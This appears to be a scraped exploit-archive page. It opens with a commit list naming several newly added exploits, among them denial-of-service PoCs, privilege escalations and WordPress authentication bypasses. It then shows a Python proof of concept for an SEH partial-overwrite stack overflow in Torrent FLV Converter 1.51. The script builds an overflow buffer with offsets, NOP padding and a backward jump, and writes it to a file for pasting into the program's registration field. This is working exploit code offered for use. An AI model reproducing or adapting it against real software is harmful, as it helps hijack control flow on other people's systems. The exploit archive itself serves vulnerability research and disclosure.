d907c78cad
8 changes to exploits/shellcodes APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC) GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC) Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite) Trend Micro Maximum Security 2019 - Arbitrary Code Execution Trend Micro Maximum Security 2019 - Privilege Escalation Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit) Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass
31 lines
No EOL
851 B
Python
Executable file
31 lines
No EOL
851 B
Python
Executable file
# Exploit Title: Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)
|
|
# Date: 2020-01-16
|
|
# Exploit Author: antonio
|
|
# Vendor Homepage: http://www.torrentrockyou.com/
|
|
# Software Link: http://www.torrentrockyou.com/download/trflvconverter.exe
|
|
# Version: 1.51 Build 117
|
|
# Tested on: Windows 7 SP1 32-bit
|
|
|
|
# Copy paste the contents of poc.txt into the
|
|
# Registration Code input field.
|
|
|
|
#!/usr/bin/python
|
|
|
|
nseh_offset = 4500
|
|
total = 5000
|
|
|
|
# badchars
|
|
# --------
|
|
# 0x00, 0x0a, 0x0d, 0x80
|
|
# 0xf0-x0ff, 0xe0-0x0ef, 0x70-0x7a
|
|
# 0x61-0x6f, 0x9a, 0x9c, 0x9e
|
|
|
|
poc = ""
|
|
poc += "A"*(nseh_offset - 53)
|
|
poc += "\x90"*53
|
|
poc += "\x7d\xcb\x90\x90" # jump backwards to NOPs: jge via SF = OF
|
|
poc += "\x7f\xb3\x45" # nseh pop pop ret: 3-byte partial overwrite
|
|
|
|
file = open("poc_seh.txt","w")
|
|
file.write(poc)
|
|
file.close() |